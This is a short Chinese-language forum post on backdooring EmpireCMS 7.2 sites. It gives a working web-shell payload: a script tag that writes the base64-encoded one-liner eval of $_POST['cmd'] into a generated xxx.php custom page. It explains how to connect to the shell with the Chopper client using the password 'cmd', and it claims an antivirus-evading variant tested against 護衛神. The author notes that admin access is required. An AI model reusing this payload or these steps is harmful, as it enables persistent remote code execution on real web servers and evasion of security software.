都知道帝國cms的安全性能也是數一數二的,很多做SEO的站都選擇了帝國cms。我有一個朋友的站點就是用帝國cms的,發現之前有過7.2的一個漏洞,如果內容直接添一句話或者php大馬是無用的,因為他會生成xxx.php前先給你執行!
自定義頁面-增加自定義頁面-隨便寫了xxx.php文件名,頁面內容填寫,<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 <?php @eval($_POST['cmd']);?> 的base64加密。 所以生成xxx.php後 會出現內容 <?php @eval($_POST['cmd']);?> 在文件裡,然後用菜刀直接連接吧!!
如果說,服務器安裝了殺軟 默認的這種是直接被殺掉的。
我寫了一個免殺的一句話 在護衛神已經測試過免殺 其他的其他大伙再進行測試吧。!
密碼是cmd
不過說下 這個適合那種留後面的一句話使用 如果說 不知道後台賬號密碼的話也是白搭 提交烏雲網肯定會被官方忽略的 而且 就一個破免殺 提烏雲 丟人